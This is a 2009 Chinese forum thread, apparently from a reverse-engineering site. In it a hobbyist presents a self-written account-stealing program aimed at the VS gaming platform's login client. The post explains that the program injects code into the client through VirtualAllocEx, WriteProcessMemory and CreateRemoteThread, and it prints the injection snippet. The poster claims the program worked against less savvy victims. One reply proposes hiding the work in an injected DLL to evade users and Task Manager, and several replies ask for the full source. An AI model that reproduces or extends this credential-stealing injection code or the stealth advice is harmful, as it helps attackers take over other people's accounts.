首页
社区
课程
招聘
[旧帖] [原创]自己写的VS对战平台盗号小程序,高手就不用看了~ 0.00雪花
发表于: 2009-2-10 10:52 19562

[旧帖] [原创]自己写的VS对战平台盗号小程序,高手就不用看了~ 0.00雪花

2009-2-10 10:52
19562

寒假一个人在家无聊,看看书,玩2局dota,其他时间就是吃饭睡觉上网。。。
上星期突然想到有事干干,那就是——写个盗号程序玩玩,于是,经过2,3天的写代码,调试,完成了 ,在这里和大家交流一下 ~(给新手交流下不错,高手不要看了)
其实本来准备写个浩方的盗号程序的,而且已经写好了,不过和同学测试的时候,同学说只有VS平台,说不得,只好把参数改了,变成现在的VS盗号程序。
其实程序是用vc写的,而且流程也比较简单,不过效果倒是不错,曾尝试了过,网上发帖测试过,对方如果不太懂电脑的话,中招的可能性很高。
好了,现在简单讲一下流程了,整个程序基于MFC对话框的(感觉有点挫
在主对话框里响应OnTimer函数,然后在OnInitDialog中Settimer。
然后就是关键了。。。Ontimer中调用CreateRemoteThread(其实这也是老方法了,网上这个函数的介绍已经多的烂了,百度一下一堆一堆的),不过还是要说一下我用了以后的感受:
首先就是在CreateRemoteThread之前要把要写入的线程,以及相应的要做参数传进去的数据结果,先用VirtualAllocEx在目标进程中分配好,然后再调用,(话说我当时很无知的直接调用CreateRemoteThread使进程崩溃了 )。
其次就是CreateRemoteThread在MFC程序下不能用debugger模式启动,启动后还是会让目标程序崩溃。。。网上查了,牛人说CreateRemoteThread在调试时会在目标进程多加入调试信息,导致崩溃。于是这个函数只能在Release下运行。
代码给出:

 void *pRemoteThread
  = VirtualAllocEx(hProcess, 0,
  1024*4, MEM_COMMIT|MEM_RESERVE,
  PAGE_EXECUTE_READWRITE);
 if (! pRemoteThread)
  return ;
 if (! WriteProcessMemory(hProcess, pRemoteThread, &RMTFunc, 1024*4, 0))
  return ;
 MyData *pData
  = (MyData*)VirtualAllocEx(hProcess, 0,
  sizeof (MyData), MEM_COMMIT,
  PAGE_READWRITE);
 if (!pData)
  return ;
 if (! WriteProcessMemory(hProcess, pData, &data, sizeof (MyData), 0))
  return ;
 HANDLE hThread
  = CreateRemoteThread(hProcess, 0,
  0, (LPTHREAD_START_ROUTINE)pRemoteThread,
  pData, 0, 0);
 if (! hThread)
 {
  return ;
 }
 CloseHandle(hThread);
 VirtualFreeEx(hProcess, pRemoteThread, 1024*3, MEM_RELEASE);
 VirtualFreeEx(hProcess, pData, sizeof (MyData), MEM_RELEASE);
 CloseHandle(hProcess);

[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

收藏
免费 7
支持
分享
最新回复 (19)
雪    币: 222
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
高手不用看,菜鸟看不懂..文章不白写了
2009-2-10 13:50
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
我就看不懂!
2009-2-10 14:25
0
雪    币: 210
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
高手不用看,菜鸟看不懂..文章不白写了 

如果你从来没接触过编程。。。是不用看了,如果你真是高手,也不用看了,这篇文章是针对有一定编程基础的读者的。。。
晕,看来没人关注。。。算了,当我白写的,本来想和人家交流一下的
2009-2-10 14:57
0
雪    币: 158
活跃值: (43)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
5
源码呢?12
2009-2-10 16:27
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
6
高手不用看,菜鸟看不懂..文章不白写了
2009-2-10 21:52
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
7
....盗了号有什么用,我8年的CS技术能盗去么?
2009-2-11 01:23
0
雪    币: 442
活跃值: (43)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
8
精华回复
2009-2-11 09:32
0
雪    币: 247
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
9
我接触过编程 有一点点的编程基础 但是很遗憾的是 我看不懂!
2009-2-11 10:55
0
雪    币: 243
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
10
我大概看了下。。还是这句话最经典。。
因为你没放全部代码,所以如果对方水平没你高,大概是没办法看懂的,,如果只是看思路。。
如果GetdlgItemText都可以直接得到密码了。。那估计是没个高手会看的。
2009-5-10 18:00
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
11
代码呢,楼主
2009-5-10 18:49
0
雪    币: 201
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
12
我也看不懂~~笨笨啊我~~
2009-5-10 18:52
0
雪    币: 360
活跃值: (82)
能力值: ( LV9,RANK:250 )
在线值:
发帖
回帖
粉丝
13
又是HHOOK,哎
2009-5-10 23:39
0
雪    币: 146
活跃值: (33)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
14
完全没必要用MFC,直接SDK就OK了,你能更改你的窗口的Visible属性,但是你隐藏不了任务栏,管理器
      可以直接用DLL远程注入,所有工作DLL中来完成,这样的隐藏线程一般人查不出的,你的所有任务就是写个程序,在VS登录器执行时注入这份DLL,然后结束自己的程序,剩下的所有事情由DLL中这只黑手完成
     OnTimer也是多余的,这样的程序活动得越少生存机会越大,只要把握好了活动时机就OK了
     不知道楼主认为我这个主意如何
2009-5-11 13:21
0
雪    币: 203
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
15
直接看源代码
2009-5-11 14:26
0
雪    币: 144
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
16
哎~用了.net窗体程序后,MFC已经基本退化到只能看得基础上了~~
2009-5-11 17:20
0
雪    币: 144
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
17
楼主能说一下createremotethread函数中传的pData指针所指的结构马?~因为看到RMTFunc中他好像是个结构,还有就是这个函数是干嘛的呢?~
2009-5-11 17:40
0
雪    币: 144
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
18
是通过这个结构得到得到信息发出去,还是这个结构中本来保存了信息?因为我看MSND中关于这个参数是[in]
2009-5-11 17:44
0
雪    币: 133
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
19
楼主啊,你要好好搞啊,

代码发出来,看看啊
2009-5-12 08:50
0
雪    币: 221
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
20
很不错的思路啊
可以刚看完VC  虽然思路很好 但是自己还是不知道怎么去实现
2009-5-12 12:42
0
游客
登录 | 注册 方可回帖
返回
//